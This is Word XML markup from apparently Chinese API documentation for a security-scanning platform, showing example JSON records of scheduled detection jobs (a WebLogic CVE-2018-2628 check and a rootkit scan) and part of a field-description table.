      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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7-04 14:57:24"</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3</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36b6825d8915db28cabc0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d136b6925d8915db28cabc1"</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agents"</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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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ronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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6-26 20:56:08"</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id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f51025d891243fb540cb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f51025d891243fb540cc"</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gent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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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ronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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6-25 18:18:56"</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3</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1f50825d891243fb540c1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c2"</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agent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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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ronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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6-25 18:18:48"</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3</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1bbc325d891243fb4be21"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bbc225d891243fb4be2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tkit快速任务检测-20190625141335"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bbc325d891243fb4be22"</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gents"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"190a788a48150865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"422a580c5470c865"</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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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ronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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6-25 14:14:26"</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DecValTok"/>
        </w:rPr>
        <w:t>215</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3</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1bb4325d891243fb4be06"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bb4325d891243fb4be05"</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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>反序列化漏洞(CVE-2018-2628)检测-20190625141201"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bb4325d891243fb4be07"</w:t>
      </w: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oup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gent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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</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ronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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6-25 14:12:19"</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DecValTok"/>
        </w:rPr>
        <w:t>3</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total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B87C74"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452"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BE2390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B8B4129" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684FA59F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5291BBE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3983F1DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B38109" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316A23E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FEFB1C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="109DC6AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E28B92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F11232D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7F4599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73DE106A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FDB378F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EF2D95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB495A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41BCAC27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2928B02A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FB0644" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="712C0B5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50BED91F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E252503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7209E3EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007983B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F592940" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449C6BB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FDCBDD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
